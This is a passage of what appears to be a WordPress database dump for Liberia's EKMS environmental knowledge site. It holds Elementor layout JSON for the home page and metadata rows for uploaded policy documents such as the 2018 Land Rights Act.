\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13257,2146,'_elementor_version','2.7.5'),(13258,2146,'_elementor_template_type','wp-page'),(13259,2146,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13263,2147,'_wp_page_template','default'),(13264,2147,'_elementor_edit_mode','builder'),(13265,2147,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13266,2147,'_elementor_version','2.7.5'),(13267,2147,'_elementor_template_type','wp-page'),(13268,2147,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13272,2148,'_elementor_controls_usage','a:0:{}'),(13273,2148,'by','EPA'),(13274,2148,'year','2018'),(13275,2148,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2018-Signed-Land-Rights-Act.pdf'),(13276,2148,'_pods_cover_image','a:1:{i:0;i:573;}'),(13277,2148,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13282,2148,'_dp_original','1707'),(13283,2148,'_edit_lock','1670324608:42'),(13284,2148,'_edit_last','42'),(13285,2149,'_wp_attached_file','2019/11/2018-Signed-Land-Rights-Act.pdf'),(13287,2148,'_pods_attached_document','a:1:{i:0;i:2149;}'),(13291,2150,'_elementor_controls_usage','a:0:{}'),(13292,2150,'by','EPA'),(13293,2150,'year','2018'),(13294,2150,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1.pdf'),(13295,2150,'_pods_cover_image','a:1:{i:0;i:573;}'),(13296,2150,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13301,2150,'_dp_original','1707'),(13302,2150,'_edit_lock','1670324607:42'),(13303,2150,'_edit_last','42'),(13304,2151,'_wp_attached_file','2019/11/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1.pdf'),(13306,2150,'_pods_attached_document','a:1:{i:0;i:2151;}'),(13312,2152,'_elementor_controls_usage','a:0:{}'),(13313,2152,'by','EPA'),(13314,2152,'year','2002'),(13315,2152,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Act-creating-the-EPA-2002.pdf'),(13316,215